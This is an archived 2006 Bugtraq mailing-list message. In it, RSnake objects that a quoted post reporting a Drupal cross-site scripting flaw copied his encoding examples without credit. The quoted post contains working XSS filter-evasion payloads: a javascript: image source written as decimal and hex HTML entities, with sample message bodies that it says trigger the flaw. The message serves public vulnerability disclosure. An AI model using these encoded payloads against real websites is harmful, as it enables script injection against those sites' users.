lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.61.0601031237170.12498@fingers.shocking.com>
Date: Tue, 3 Jan 2006 12:38:59 -0800 (PST)
From: RSnake <rsnake@...cking.com>
To: liz0@...mail.com
Cc: bugtraq@...urityfocus.com
Subject: Re: Drupal all versiyon xss cehennem.org



 	Hi, it would be nice if you could give me some props next time,
as this code is pulled straight from my site.  I don't mind if you
re-use it, but just plain ripping code from my site isn't super cool.

On Mon, 2 Jan 2006 liz0@...mail.com wrote:

> Drupal all versiyon xss
> ----------------------------------------------------
> site:http://www.drupal.org
>
> Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
> --------------------------------------------------
>
> img tag : on
>
> ---------------------------------------------------------------------------------------------------------------------------------------------------------------------
>
> Decimal Value: HTML (without semicolons)
>
> <img src=javascript:alert('XSS')>  = <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>
> ---------------------------------------------------------------------------------------------------------------------------------------------------------------
> Decimal Value: HTML (with semicolons)
>
> <img src=javascript:alert('XSS')>  = <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
>
>
> ---------------------------------------------------------------------------------------------------------------------------------------------------------------
> example:
> post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> Vulnerable
>
> post mesage  :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> Vulnerable
>
>
> ---------------------------------------------------------
>
> Credit:Liz0ziM
> mail:liz0@...mail.com
> www.biyo.tk , www.cehennem.org
>
> Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend
>
> -----------------------------------------------------------
> Source:
>
> http://liz0zim.no-ip.org/drupal.txt
>
> ------------------------------------------------------------
>
>


-R


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ